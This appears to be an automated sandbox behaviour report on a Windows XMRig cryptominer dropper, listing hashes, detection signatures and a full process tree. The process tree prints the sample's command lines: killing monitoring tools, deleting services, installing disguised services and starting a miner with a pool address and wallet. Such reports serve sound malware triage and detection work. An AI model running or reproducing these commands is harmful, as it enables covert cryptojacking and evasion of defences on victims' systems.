Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22/05/2024, 15:02
Behavioral task
behavioral1
Sample
67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
Resource
win7-20240419-en
General
-
Target
67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
-
Size
1.5MB
-
MD5
67aa4626a523e1eac3b90552be1cd4ad
-
SHA1
9eb3bd7d1131a820a87b20a1631bc7b6bf9140c9
-
SHA256
ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2
-
SHA512
bfc6c4098a1c550ee41544b084eb0d2488577e656b5106a445a553a37a7a80e6b8a84be7f1467d3ca6c31046191f32c4feae31a56c5e16093b71fec7ea7d37de
-
SSDEEP
24576:+c/nsodv5hQpu6q8K8MZLQJTkeOfAn/RZDtbQLf7u+YAgNdwuL8wmKiVME:/nHB5hYb4x2ftbQ2+owugwE9
Malware Config
Signatures
-
XMRig Miner payload 3 IoCs
resource yara_rule behavioral2/memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp xmrig behavioral2/files/0x0007000000023432-23.dat xmrig behavioral2/files/0x0008000000023430-33.dat xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe -
Deletes itself 1 IoCs
pid Process 4948 WScript.exe -
Executes dropped EXE 12 IoCs
pid Process 4336 svchost.exe 4916 svchost.exe 2604 svchost.exe 4980 svchost.exe 3420 svchost.exe 4824 conhost.exe 1012 svchost.exe 4584 svchost.exe 556 svchost.exe 3620 svchost.exe 2544 svchost.exe 1760 KvMonXP.exe -
resource yara_rule behavioral2/memory/2784-0-0x0000000000400000-0x00000000009C1000-memory.dmp upx behavioral2/memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp upx -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\svchost.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3980 sc.exe 4080 sc.exe 1088 sc.exe 3636 sc.exe 4128 sc.exe 3660 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 6 IoCs
pid Process 4416 taskkill.exe 2596 taskkill.exe 2808 taskkill.exe 2712 taskkill.exe 880 taskkill.exe 3516 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe 4824 conhost.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2808 taskkill.exe Token: SeDebugPrivilege 880 taskkill.exe Token: SeDebugPrivilege 3516 taskkill.exe Token: SeDebugPrivilege 2712 taskkill.exe Token: SeDebugPrivilege 4416 taskkill.exe Token: SeDebugPrivilege 2596 taskkill.exe Token: SeLockMemoryPrivilege 1760 KvMonXP.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 4824 conhost.exe 4824 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2784 wrote to memory of 832 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 82 PID 2784 wrote to memory of 832 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 82 PID 2784 wrote to memory of 832 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 82 PID 2784 wrote to memory of 3620 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 83 PID 2784 wrote to memory of 3620 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 83 PID 2784 wrote to memory of 3620 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 83 PID 2784 wrote to memory of 3660 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 84 PID 2784 wrote to memory of 3660 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 84 PID 2784 wrote to memory of 3660 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 84 PID 2784 wrote to memory of 1892 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 85 PID 2784 wrote to memory of 1892 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 85 PID 2784 wrote to memory of 1892 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 85 PID 2784 wrote to memory of 4128 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 86 PID 2784 wrote to memory of 4128 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 86 PID 2784 wrote to memory of 4128 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 86 PID 2784 wrote to memory of 1584 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 87 PID 2784 wrote to memory of 1584 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 87 PID 2784 wrote to memory of 1584 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 87 PID 2784 wrote to memory of 3636 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 88 PID 2784 wrote to memory of 3636 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 88 PID 2784 wrote to memory of 3636 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 88 PID 2784 wrote to memory of 1088 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 89 PID 2784 wrote to memory of 1088 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 89 PID 2784 wrote to memory of 1088 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 89 PID 2784 wrote to memory of 512 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 90 PID 2784 wrote to memory of 512 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 90 PID 2784 wrote to memory of 512 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 90 PID 2784 wrote to memory of 4080 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 91 PID 2784 wrote to memory of 4080 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 91 PID 2784 wrote to memory of 4080 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 91 PID 2784 wrote to memory of 1588 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 92 PID 2784 wrote to memory of 1588 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 92 PID 2784 wrote to memory of 1588 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 92 PID 2784 wrote to memory of 3980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 93 PID 2784 wrote to memory of 3980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 93 PID 2784 wrote to memory of 3980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 93 PID 2784 wrote to memory of 4336 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 96 PID 2784 wrote to memory of 4336 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 96 PID 2784 wrote to memory of 4916 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 97 PID 2784 wrote to memory of 4916 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 97 PID 2784 wrote to memory of 2604 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 98 PID 2784 wrote to memory of 2604 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 98 PID 2784 wrote to memory of 4980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 99 PID 2784 wrote to memory of 4980 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 99 PID 3620 wrote to memory of 5112 3620 net.exe 114 PID 3620 wrote to memory of 5112 3620 net.exe 114 PID 3620 wrote to memory of 5112 3620 net.exe 114 PID 832 wrote to memory of 4864 832 cmd.exe 115 PID 832 wrote to memory of 4864 832 cmd.exe 115 PID 832 wrote to memory of 4864 832 cmd.exe 115 PID 1584 wrote to memory of 4516 1584 net.exe 116 PID 1584 wrote to memory of 4516 1584 net.exe 116 PID 1584 wrote to memory of 4516 1584 net.exe 116 PID 1892 wrote to memory of 1812 1892 net.exe 117 PID 1892 wrote to memory of 1812 1892 net.exe 117 PID 1892 wrote to memory of 1812 1892 net.exe 117 PID 512 wrote to memory of 4632 512 net.exe 118 PID 512 wrote to memory of 4632 512 net.exe 118 PID 512 wrote to memory of 4632 512 net.exe 118 PID 1588 wrote to memory of 4460 1588 net.exe 119 PID 1588 wrote to memory of 4460 1588 net.exe 119 PID 1588 wrote to memory of 4460 1588 net.exe 119 PID 2784 wrote to memory of 4948 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 121 PID 2784 wrote to memory of 4948 2784 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe 121 -
Views/modifies file attributes 1 TTPs 64 IoCs
pid Process 2880 attrib.exe 2896 attrib.exe 1484 attrib.exe 880 attrib.exe 872 attrib.exe 2620 attrib.exe 3588 attrib.exe 1568 attrib.exe 1508 attrib.exe 4412 attrib.exe 3648 attrib.exe 4224 attrib.exe 1340 attrib.exe 1504 attrib.exe 3784 attrib.exe 740 attrib.exe 1728 attrib.exe 1312 attrib.exe 3284 attrib.exe 2916 attrib.exe 4816 attrib.exe 4588 attrib.exe 4536 attrib.exe 3980 attrib.exe 4148 attrib.exe 760 attrib.exe 2740 attrib.exe 4252 attrib.exe 2608 attrib.exe 4972 attrib.exe 2620 attrib.exe 372 attrib.exe 2524 attrib.exe 3412 attrib.exe 4864 attrib.exe 3724 attrib.exe 3412 attrib.exe 1960 attrib.exe 4956 attrib.exe 3320 attrib.exe 2808 attrib.exe 1096 attrib.exe 1308 attrib.exe 2128 attrib.exe 3404 attrib.exe 3904 attrib.exe 868 attrib.exe 3304 attrib.exe 4348 attrib.exe 5012 attrib.exe 1172 attrib.exe 1476 attrib.exe 1928 attrib.exe 3152 attrib.exe 3724 attrib.exe 3612 attrib.exe 1504 attrib.exe 3008 attrib.exe 4524 attrib.exe 2472 attrib.exe 3532 attrib.exe 4128 attrib.exe 3792 attrib.exe 224 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
- Views/modifies file attributes
PID:4864
-
-
-
C:\Windows\SysWOW64\net.exenet stop Microsarver2⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Microsarver3⤵PID:5112
-
-
-
C:\Windows\SysWOW64\sc.exesc delete Microsarver2⤵
- Launches sc.exe
PID:3660
-
-
C:\Windows\SysWOW64\net.exenet stop Samsorver2⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Samsorver3⤵PID:1812
-
-
-
C:\Windows\SysWOW64\sc.exesc delete Samsorver2⤵
- Launches sc.exe
PID:4128
-
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y3⤵PID:4516
-
-
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED 2>nul2⤵
- Launches sc.exe
PID:3636
-
-
C:\Windows\SysWOW64\sc.exesc delete lanmanserver2⤵
- Launches sc.exe
PID:1088
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵PID:4632
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
- Launches sc.exe
PID:4080
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵PID:4460
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
- Launches sc.exe
PID:3980
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe2⤵
- Executes dropped EXE
PID:4336
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service2⤵
- Executes dropped EXE
PID:4916
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.2⤵
- Executes dropped EXE
PID:2604
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start Microsarver2⤵
- Executes dropped EXE
PID:4980
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
- Deletes itself
PID:4948
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
PID:3420 -
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4824 -
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵PID:1984
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4176
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵PID:4788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵PID:3520
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵PID:4976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵PID:2256
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵PID:3044
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵PID:2620
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵PID:2396
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2916
-
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install Samsorver KvMonXP -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash3⤵
- Executes dropped EXE
PID:1012
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Samsorver DisplayName WMI Performance Services3⤵
- Executes dropped EXE
PID:4584
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Samsorver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
PID:3620
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start Samsorver3⤵
- Executes dropped EXE
PID:556
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2740
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:760
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4224
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3492
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3716
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2312
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:1484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1012
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4272
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2724
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2568
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4812
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:5088
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3868
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4556
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3652
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4356
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3784
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4940
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3768
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4496
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:224
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:5112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4888
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1052
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2180
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:5008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3720
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2944
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4712
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1172
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3444
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2392
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2264
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:4464
-
-
-
